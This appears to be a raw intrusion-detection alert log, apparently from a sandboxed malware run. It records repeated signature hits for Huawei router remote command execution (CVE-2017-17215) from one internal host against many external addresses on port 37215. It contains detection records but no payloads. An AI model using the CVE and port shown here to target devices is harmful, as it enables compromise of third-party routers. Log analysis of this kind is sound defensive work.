                                                        06/13/24-21:32:40.377060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673437215192.168.2.1441.191.92.210
                                                        06/13/24-21:32:58.839021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856437215192.168.2.14156.239.77.184
                                                        06/13/24-21:31:57.093639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045637215192.168.2.1441.154.117.158
                                                        06/13/24-21:33:13.229177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352237215192.168.2.14156.162.69.204
                                                        06/13/24-21:32:36.247243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754637215192.168.2.14197.210.24.196
                                                        06/13/24-21:32:50.615231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932437215192.168.2.14156.6.0.221
                                                        06/13/24-21:32:28.023603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174837215192.168.2.14156.94.27.179
                                                        06/13/24-21:32:30.091684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646637215192.168.2.14156.13.142.99
                                                        06/13/24-21:32:42.424132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280637215192.168.2.14156.16.122.233
                                                        06/13/24-21:33:13.229335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941837215192.168.2.14156.190.64.80
                                                        06/13/24-21:32:19.749810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146237215192.168.2.1441.83.74.175
                                                        06/13/24-21:32:48.555360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762437215192.168.2.14156.144.206.86
                                                        06/13/24-21:32:25.978513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426237215192.168.2.14197.209.189.60
                                                        06/13/24-21:32:25.971778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992437215192.168.2.1441.160.24.16
                                                        06/13/24-21:33:02.908172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088637215192.168.2.1441.95.42.111
                                                        06/13/24-21:32:05.346146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529437215192.168.2.14156.227.149.193
                                                        06/13/24-21:32:05.350737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583437215192.168.2.1441.45.149.151
                                                        06/13/24-21:32:09.436639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4245437215192.168.2.14156.240.62.32
                                                        06/13/24-21:33:13.231805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179237215192.168.2.1441.12.6.127
                                                        06/13/24-21:33:02.911500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003637215192.168.2.14156.25.147.94
                                                        06/13/24-21:32:56.757354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.14156.116.85.57
                                                        06/13/24-21:33:02.936429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425637215192.168.2.1441.165.29.207
                                                        06/13/24-21:32:40.374263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481237215192.168.2.14197.20.160.16
                                                        06/13/24-21:32:03.310202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352237215192.168.2.14156.197.253.242
                                                        06/13/24-21:32:46.525875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849437215192.168.2.14156.16.137.203
                                                        06/13/24-21:32:11.507656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089837215192.168.2.14156.201.113.60
                                                        06/13/24-21:32:19.728302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442237215192.168.2.14156.159.243.54
                                                        06/13/24-21:32:52.679965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612437215192.168.2.14197.186.208.212
                                                        06/13/24-21:32:32.154550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.14197.19.67.41
                                                        06/13/24-21:32:36.244117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3556037215192.168.2.1441.242.140.148
                                                        06/13/24-21:33:17.307026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906037215192.168.2.14197.119.247.29
                                                        06/13/24-21:32:13.547419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330237215192.168.2.1441.7.126.99
                                                        06/13/24-21:33:11.159049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529437215192.168.2.14156.216.246.93
                                                        06/13/24-21:32:52.657255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280037215192.168.2.1441.167.92.219
                                                        06/13/24-21:33:11.158033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798037215192.168.2.14156.125.132.145
                                                        06/13/24-21:32:42.404767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287637215192.168.2.14197.159.87.242
                                                        06/13/24-21:33:09.088859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138237215192.168.2.14156.171.42.224
                                                        06/13/24-21:33:11.180680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660837215192.168.2.14156.90.172.213
                                                        06/13/24-21:32:19.752073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513037215192.168.2.1441.222.134.253
                                                        06/13/24-21:32:42.424341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966837215192.168.2.14156.236.35.68
                                                        06/13/24-21:32:46.503335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660637215192.168.2.14156.75.72.90
                                                        06/13/24-21:32:17.697608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315237215192.168.2.1441.87.225.20
                                                        06/13/24-21:32:42.419532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052037215192.168.2.1441.132.167.5
                                                        06/13/24-21:32:42.422231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985837215192.168.2.14197.235.207.253
                                                        06/13/24-21:33:00.888854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023437215192.168.2.1441.48.5.125
                                                        06/13/24-21:32:03.310328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362637215192.168.2.1441.99.254.239
                                                        06/13/24-21:31:57.132655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770237215192.168.2.1441.66.97.197
                                                        06/13/24-21:33:11.159014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331837215192.168.2.14197.188.246.35
                                                        06/13/24-21:31:57.153228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128637215192.168.2.14156.235.26.115
                                                        06/13/24-21:31:57.132305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624637215192.168.2.14156.87.117.200
                                                        06/13/24-21:32:38.303168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775637215192.168.2.14156.99.157.14
                                                        06/13/24-21:32:19.727350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752837215192.168.2.14197.167.114.215
                                                        06/13/24-21:32:42.404439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743237215192.168.2.14156.57.232.171
                                                        06/13/24-21:33:11.160134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990237215192.168.2.14156.192.32.39
                                                        06/13/24-21:33:04.990249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890037215192.168.2.1441.141.152.2
                                                        06/13/24-21:32:13.569083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035837215192.168.2.1441.11.36.74
                                                        06/13/24-21:33:15.257672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317437215192.168.2.1441.252.105.48
                                                        06/13/24-21:32:34.194325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017837215192.168.2.1441.132.129.27
                                                        06/13/24-21:32:21.780064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440037215192.168.2.14197.59.253.57
                                                        06/13/24-21:32:30.077923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648037215192.168.2.1441.151.208.126
                                                        06/13/24-21:32:17.676538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797637215192.168.2.1441.89.243.202
                                                        06/13/24-21:32:28.025751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876837215192.168.2.1441.199.105.221
                                                        06/13/24-21:32:05.348592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282437215192.168.2.14156.87.96.23
                                                        06/13/24-21:32:28.025275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929837215192.168.2.1441.164.17.239
                                                        06/13/24-21:32:48.569724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241437215192.168.2.14156.35.217.145
                                                        06/13/24-21:32:36.264314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770237215192.168.2.14156.215.58.227
                                                        06/13/24-21:32:07.403166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945437215192.168.2.14197.21.99.138
                                                        06/13/24-21:32:34.193731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427637215192.168.2.14197.207.199.148
                                                        06/13/24-21:32:40.376251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894037215192.168.2.1441.214.136.118
                                                        06/13/24-21:31:57.136448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709837215192.168.2.14156.102.232.222
                                                        06/13/24-21:32:17.678214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227037215192.168.2.14197.97.214.253
                                                        06/13/24-21:32:28.023821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626637215192.168.2.14156.109.239.91
                                                        06/13/24-21:32:19.730662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870837215192.168.2.14156.199.163.66
                                                        06/13/24-21:32:21.804158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104237215192.168.2.14156.132.227.196
                                                        06/13/24-21:33:00.868443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947837215192.168.2.14197.179.134.89
                                                        06/13/24-21:32:05.370885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825437215192.168.2.14156.249.148.164
                                                        06/13/24-21:33:15.275008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.14197.112.4.153
                                                        06/13/24-21:32:40.377404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182837215192.168.2.14156.186.71.138
                                                        06/13/24-21:33:13.213849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571237215192.168.2.14156.127.55.204
                                                        06/13/24-21:33:13.228585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013837215192.168.2.14156.167.12.125
                                                        06/13/24-21:32:32.167467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316637215192.168.2.14197.135.160.132
                                                        06/13/24-21:32:15.610400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874837215192.168.2.14156.64.236.190
                                                        06/13/24-21:32:09.459090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983037215192.168.2.1441.236.60.154
                                                        06/13/24-21:32:17.696463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292837215192.168.2.1441.54.14.237
                                                        06/13/24-21:32:32.153162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177837215192.168.2.14156.237.148.1
                                                        06/13/24-21:32:42.408705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436237215192.168.2.14197.230.9.227
                                                        06/13/24-21:32:58.841675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860837215192.168.2.14156.220.169.49
                                                        06/13/24-21:32:11.508955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050037215192.168.2.14197.199.3.100
                                                        06/13/24-21:33:05.013992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841637215192.168.2.1441.161.21.18
                                                        06/13/24-21:32:30.076969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873437215192.168.2.14197.175.146.218
                                                        06/13/24-21:33:04.992023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400637215192.168.2.14197.73.130.209
                                                        06/13/24-21:33:15.254094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798637215192.168.2.1441.128.97.111
                                                        06/13/24-21:31:57.092180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521637215192.168.2.14156.177.28.10
                                                        06/13/24-21:32:23.936231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558237215192.168.2.1441.172.215.183
                                                        06/13/24-21:32:32.156121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424837215192.168.2.14197.74.196.247
                                                        06/13/24-21:33:05.012643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452637215192.168.2.14197.118.153.219
                                                        06/13/24-21:32:56.753380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521437215192.168.2.1441.244.139.212
                                                        06/13/24-21:32:32.156201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579037215192.168.2.1441.172.3.185
                                                        06/13/24-21:33:09.087840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722237215192.168.2.1441.136.104.206
                                                        06/13/24-21:31:59.177813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845037215192.168.2.14156.238.222.107
                                                        06/13/24-21:32:15.634279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925037215192.168.2.1441.251.219.62
                                                        06/13/24-21:33:04.988290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730837215192.168.2.14156.172.226.255
                                                        06/13/24-21:32:03.301401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313037215192.168.2.14197.19.0.15
                                                        06/13/24-21:32:32.166122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040437215192.168.2.1441.160.159.137
                                                        06/13/24-21:32:09.457445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341437215192.168.2.14156.183.172.186
                                                        06/13/24-21:32:09.456057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233837215192.168.2.14156.97.33.180
                                                        06/13/24-21:32:13.545783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483837215192.168.2.1441.67.229.206
                                                        06/13/24-21:32:28.043477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777437215192.168.2.1441.2.75.246
                                                        06/13/24-21:32:36.245621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4620437215192.168.2.14156.205.228.28
                                                        06/13/24-21:33:09.087170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080437215192.168.2.14197.35.69.57
                                                        06/13/24-21:32:07.416877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263637215192.168.2.14197.241.97.3
                                                        06/13/24-21:33:05.011740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983637215192.168.2.14197.143.130.99
                                                        06/13/24-21:32:30.079967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694837215192.168.2.14156.13.188.194
                                                        06/13/24-21:32:07.419891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715237215192.168.2.14156.140.89.92
                                                        06/13/24-21:32:32.154370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157637215192.168.2.1441.60.53.62
                                                        06/13/24-21:32:36.247650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968037215192.168.2.14156.28.128.183
                                                        06/13/24-21:32:15.610220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314237215192.168.2.1441.251.4.91
                                                        06/13/24-21:32:38.303115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402437215192.168.2.14197.202.246.211
                                                        06/13/24-21:33:11.173077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992637215192.168.2.14156.131.241.204
                                                        06/13/24-21:32:46.503501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269837215192.168.2.1441.98.255.159
                                                        06/13/24-21:32:17.675164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918237215192.168.2.14197.119.3.239
                                                        06/13/24-21:32:23.831839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559637215192.168.2.1441.225.224.218
                                                        06/13/24-21:32:07.401051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036237215192.168.2.1441.65.112.125
                                                        06/13/24-21:32:30.128204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346237215192.168.2.14197.10.215.56
                                                        06/13/24-21:33:02.954026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678437215192.168.2.14197.78.157.180
                                                        06/13/24-21:32:01.238651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398037215192.168.2.14197.111.51.84
                                                        06/13/24-21:32:30.099481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976637215192.168.2.14156.79.126.63
                                                        06/13/24-21:32:58.843657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812037215192.168.2.14197.137.205.225
                                                        06/13/24-21:32:32.153636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762237215192.168.2.14197.240.110.53
                                                        06/13/24-21:33:13.227358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382437215192.168.2.1441.146.173.27
                                                        06/13/24-21:32:38.303359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266437215192.168.2.14156.74.114.172
                                                        06/13/24-21:31:57.093081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114237215192.168.2.14197.95.142.7
                                                        06/13/24-21:32:30.123630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145037215192.168.2.14197.251.123.227
                                                        06/13/24-21:32:09.440920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063237215192.168.2.14156.110.173.138
                                                        06/13/24-21:32:44.450511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829237215192.168.2.14156.112.233.103
                                                        06/13/24-21:32:25.975650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698637215192.168.2.14197.15.133.12
                                                        06/13/24-21:32:25.977755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270037215192.168.2.1441.220.192.167
                                                        06/13/24-21:32:03.307570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026437215192.168.2.1441.141.240.146
                                                        06/13/24-21:32:30.074400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876637215192.168.2.14197.53.237.47
                                                        06/13/24-21:32:32.152185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479437215192.168.2.14197.186.91.30
                                                        06/13/24-21:32:23.833563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653637215192.168.2.14156.210.68.212
                                                        06/13/24-21:32:46.507933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585837215192.168.2.14197.138.26.98
                                                        06/13/24-21:33:15.273261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964237215192.168.2.1441.197.113.119
                                                        06/13/24-21:33:09.108564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306237215192.168.2.1441.252.228.188
                                                        06/13/24-21:33:02.910148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180437215192.168.2.14197.94.203.132
                                                        06/13/24-21:32:19.752136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668037215192.168.2.14197.233.232.60
                                                        06/13/24-21:32:38.302725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785037215192.168.2.14197.198.158.123
                                                        06/13/24-21:32:42.407205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800437215192.168.2.1441.116.228.124
                                                        06/13/24-21:32:07.417634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430637215192.168.2.1441.255.24.243
                                                        06/13/24-21:33:11.157762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832037215192.168.2.1441.123.42.47
                                                        06/13/24-21:32:25.995055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108437215192.168.2.14156.22.131.210
                                                        06/13/24-21:32:44.480229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551037215192.168.2.14197.182.45.254
                                                        06/13/24-21:33:11.181698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5582637215192.168.2.14197.110.103.18
                                                        06/13/24-21:32:05.350465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237837215192.168.2.14156.221.117.2
                                                        06/13/24-21:32:23.831522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529237215192.168.2.14197.190.55.11
                                                        06/13/24-21:32:48.551957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997637215192.168.2.1441.9.158.203
                                                        06/13/24-21:32:25.994658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397237215192.168.2.14156.25.55.92
                                                        06/13/24-21:33:17.305791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291237215192.168.2.14156.167.29.204
                                                        06/13/24-21:32:05.347597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470637215192.168.2.14156.188.15.134
                                                        06/13/24-21:33:07.040366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090837215192.168.2.14156.188.212.148
                                                        06/13/24-21:33:09.127335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818437215192.168.2.14156.95.19.26
                                                        06/13/24-21:32:34.212434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158037215192.168.2.14197.15.208.244
                                                        06/13/24-21:32:50.612949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405837215192.168.2.1441.249.221.160
                                                        06/13/24-21:32:34.214513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382437215192.168.2.14197.161.14.93
                                                        06/13/24-21:32:11.507931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941837215192.168.2.14197.172.6.147
                                                        06/13/24-21:32:21.787157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356037215192.168.2.14197.150.76.14
                                                        06/13/24-21:32:07.402875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885237215192.168.2.14156.13.221.230
                                                        06/13/24-21:32:19.727618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558237215192.168.2.14197.117.85.164
                                                        06/13/24-21:32:19.728669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173037215192.168.2.1441.144.153.144
                                                        06/13/24-21:33:13.213474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019637215192.168.2.14156.37.244.70
                                                        06/13/24-21:32:52.669462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124037215192.168.2.14197.197.16.33
                                                        06/13/24-21:32:56.784572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599437215192.168.2.1441.189.233.238
                                                        06/13/24-21:32:19.726990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235237215192.168.2.14156.66.202.90
                                                        06/13/24-21:32:38.298202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724437215192.168.2.14156.51.43.144
                                                        06/13/24-21:32:40.373833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504437215192.168.2.14197.79.239.111
                                                        06/13/24-21:32:23.834173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303037215192.168.2.14156.159.72.237
                                                        06/13/24-21:33:15.271127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687837215192.168.2.14197.164.144.206
                                                        06/13/24-21:32:58.822334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924437215192.168.2.14197.43.10.208
                                                        06/13/24-21:32:13.545828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926037215192.168.2.14197.198.151.197
                                                        06/13/24-21:33:02.949874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791437215192.168.2.1441.86.130.147
                                                        06/13/24-21:32:30.075630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560637215192.168.2.1441.158.142.37
                                                        06/13/24-21:33:09.127306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4431637215192.168.2.1441.173.5.248
                                                        06/13/24-21:33:09.106348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413637215192.168.2.14156.132.143.150
                                                        06/13/24-21:33:07.054972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294037215192.168.2.14197.116.60.5
                                                        06/13/24-21:33:04.993327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462037215192.168.2.1441.227.196.24
                                                        06/13/24-21:32:15.633308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945237215192.168.2.1441.74.106.241
